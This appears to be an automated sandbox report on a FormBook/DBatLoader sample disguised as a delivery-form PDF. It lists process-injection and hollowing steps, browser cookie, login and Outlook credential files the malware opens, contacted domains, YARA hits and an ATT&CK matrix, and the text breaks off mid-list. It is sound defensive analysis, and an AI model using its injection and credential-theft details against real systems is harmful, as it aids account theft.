                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Users\Public\Libraries\dxobknwL.pifSection loaded: NULL target: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\dxobknwL.pifSection loaded: NULL target: C:\Windows\SysWOW64\proquota.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\dxobknwL.pifSection loaded: NULL target: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: NULL target: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: NULL target: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeSection loaded: NULL target: C:\Users\Public\Libraries\dxobknwL.pif protection: execute and read and writeJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeSection loaded: NULL target: C:\Windows\SysWOW64\proquota.exe protection: execute and read and writeJump to behavior
                      Queues an APC in another process (thread injection)
                      Source: C:\Windows\SysWOW64\proquota.exeThread APC queued: target process: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeJump to behavior
                      Sample uses process hollowing technique
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeSection unmapped: C:\Users\Public\Libraries\dxobknwL.pif base address: 400000Jump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection unmapped: C:\Users\Public\Libraries\dxobknwL.pif base address: 400000Jump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection unmapped: C:\Users\Public\Libraries\dxobknwL.pif base address: 400000Jump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeMemory written: C:\Users\Public\Libraries\dxobknwL.pif base: 3EA008Jump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFMemory written: C:\Users\Public\Libraries\dxobknwL.pif base: 33F008Jump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFMemory written: C:\Users\Public\Libraries\dxobknwL.pif base: 2A1008Jump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess created: C:\Users\Public\Libraries\dxobknwL.pif C:\Users\Public\Libraries\dxobknwL.pifJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess created: C:\Users\Public\Libraries\dxobknwL.pif C:\Users\Public\Libraries\dxobknwL.pifJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess created: C:\Users\Public\Libraries\dxobknwL.pif C:\Users\Public\Libraries\dxobknwL.pifJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeProcess created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeProcess created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"Jump to behavior
                      Source: IzFuULsBXSkS.exe, 0000000F.00000000.2070949198.0000000001310000.00000002.00000001.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 0000000F.00000002.2916132035.0000000001310000.00000002.00000001.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 00000011.00000002.2916109568.0000000001940000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: IzFuULsBXSkS.exe, 0000000F.00000000.2070949198.0000000001310000.00000002.00000001.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 0000000F.00000002.2916132035.0000000001310000.00000002.00000001.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 00000011.00000002.2916109568.0000000001940000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: IzFuULsBXSkS.exe, 0000000F.00000000.2070949198.0000000001310000.00000002.00000001.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 0000000F.00000002.2916132035.0000000001310000.00000002.00000001.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 00000011.00000002.2916109568.0000000001940000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: IzFuULsBXSkS.exe, 0000000F.00000000.2070949198.0000000001310000.00000002.00000001.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 0000000F.00000002.2916132035.0000000001310000.00000002.00000001.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 00000011.00000002.2916109568.0000000001940000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02935A78
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: GetLocaleInfoA,0_2_0293A798
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: GetLocaleInfoA,0_2_0293A74C
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02935B84
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,5_2_02875A78
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFCode function: GetLocaleInfoA,5_2_0287A798
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,5_2_02875B83
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_02939194 GetLocalTime,0_2_02939194
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_0293B714 GetVersionExA,0_2_0293B714
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 14.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2284510742.0000000032130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2455762995.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2916436350.0000000005890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2264670714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2229871914.000000002AE60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2271670013.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2236634830.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2284786818.0000000034AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2212491351.0000000029F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2916624441.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2916429816.00000000033C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2455645977.0000000000920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\SysWOW64\proquota.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\SysWOW64\proquota.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 14.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2284510742.0000000032130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2455762995.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2916436350.0000000005890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2264670714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2229871914.000000002AE60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2271670013.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2236634830.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2284786818.0000000034AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2212491351.0000000029F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2916624441.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2916429816.00000000033C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2455645977.0000000000920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Valid Accounts                      		1
                      Native API                      		1
                      DLL Side-Loading                      		1
                      Abuse Elevation Control Mechanism                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Shared Modules                      		1
                      Valid Accounts                      		1
                      DLL Side-Loading                      		1
                      Abuse Elevation Control Mechanism                      		LSASS Memory1
                      System Network Connections Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Registry Run Keys / Startup Folder                      		1
                      Valid Accounts                      		2
                      Obfuscated Files or Information                      		Security Account Manager1
                      File and Directory Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		2
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      Access Token Manipulation                      		1
                      Software Packing                      		NTDS136
                      System Information Discovery                      		Distributed Component Object ModelInput Capture13
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script512
                      Process Injection                      		1
                      Timestomp                      		LSA Secrets421
                      Security Software Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                      Registry Run Keys / Startup Folder                      		1
                      DLL Side-Loading                      		Cached Domain Credentials2
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                      Masquerading                      		DCSync2
                      Process Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Valid Accounts                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Access Token Manipulation                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
                      Virtualization/Sandbox Evasion                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd512
                      Process Injection                      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580843 Sample: Delivery form - Airway bill... Startdate: 26/12/2024 Architecture: WINDOWS Score: 100 64 www.bellhomehd.shop 2->64 66 drive.usercontent.google.com 2->66 68 2 other IPs or domains 2->68 76 Suricata IDS alerts for network traffic 2->76 78 Found malware configuration 2->78 80 Multi AV Scanner detection for submitted file 2->80 82 12 other signatures 2->82 10 Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe 1 10 2->10         started        15 Lwnkboxd.PIF 6 2->15         started        17 Lwnkboxd.PIF 6 2->17         started        signatures3 process4 dnsIp5 70 drive.usercontent.google.com 142.250.181.97, 443, 49732 GOOGLEUS United States 10->70 72 drive.google.com 172.217.19.238, 443, 49730, 49731 GOOGLEUS United States 10->72 54 C:\Users\Public\Libraries\dxobknwL.pif, PE32 10->54 dropped 56 C:\Users\Public\Libraries\Lwnkboxd.PIF, PE32 10->56 dropped 58 C:\Users\Public\Lwnkboxd.url, MS 10->58 dropped 60 2 other malicious files 10->60 dropped 100 Writes to foreign memory regions 10->100 102 Allocates memory in foreign processes 10->102 104 Sample uses process hollowing technique 10->104 19 dxobknwL.pif 10->19         started        22 cmd.exe 1 10->22         started        106 Multi AV Scanner detection for dropped file 15->106 108 Sample is not signed and drops a device driver 15->108 110 Allocates many large memory junks 15->110 24 dxobknwL.pif 15->24         started        26 cmd.exe 15->26         started        28 cmd.exe 1 17->28         started        30 dxobknwL.pif 17->30         started        file6 signatures7 process8 signatures9 84 Detected unpacking (changes PE section rights) 19->84 86 Maps a DLL or memory area into another process 19->86 32 IzFuULsBXSkS.exe 19->32 injected 34 conhost.exe 22->34         started        36 IzFuULsBXSkS.exe 24->36 injected 39 conhost.exe 26->39         started        41 conhost.exe 28->41         started        process10 signatures11 43 proquota.exe 13 32->43         started        88 Maps a DLL or memory area into another process 36->88 90 Found direct / indirect Syscall (likely to bypass EDR) 36->90 46 proquota.exe 36->46         started        process12 signatures13 92 Tries to steal Mail credentials (via file / registry access) 43->92 94 Tries to harvest and steal browser information (history, passwords, etc) 43->94 96 Maps a DLL or memory area into another process 43->96 98 2 other signatures 43->98 48 IzFuULsBXSkS.exe 43->48 injected 52 firefox.exe 43->52         started        process14 dnsIp15 62 94950.bodis.com 199.59.243.227, 49756, 80 BODIS-NJUS United States 48->62 74 Found direct / indirect Syscall (likely to bypass EDR) 48->74 signatures16

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe34%VirustotalBrowse
                      Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe63%ReversingLabsWin32.Trojan.DBatLoader

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\Public\Libraries\Lwnkboxd.PIF63%ReversingLabsWin32.Trojan.DBatLoader
                      C:\Users\Public\Libraries\dxobknwL.pif3%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://programania.com/en.htm0%Avira URL Cloudsafe
                      http://programania.com/index_ru.htm0%Avira URL Cloudsafe
                      http://programania.com/en_source.zip0%Avira URL Cloudsafe
                      http://programania.com/en.zip0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      94950.bodis.com
                      		199.59.243.227
                      		truefalse
                        		high
                        drive.google.com
                        		172.217.19.238
                        		truefalse
                          		high
                          drive.usercontent.google.com
                          		142.250.181.97
                          		truefalse
                            		high
                            www.bellhomehd.shop
                            		unknown
                            		unknownfalse
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://ac.ecosia.org/autocomplete?q=proquota.exe, 00000010.00000002.2457969749.000000000776C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://drive.usercontent.google.com/P0Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1774111386.0000000000721000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.google.comproquota.exe, 00000010.00000002.2456357700.0000000004EB4000.00000004.10000000.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 00000013.00000002.2916952193.0000000002FE4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2915059830.0000000037254000.00000004.80000000.00040000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/chrome_newtabproquota.exe, 00000010.00000002.2457969749.000000000776C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=proquota.exe, 00000010.00000002.2457969749.000000000776C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://sectigo.com/CPS0Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, 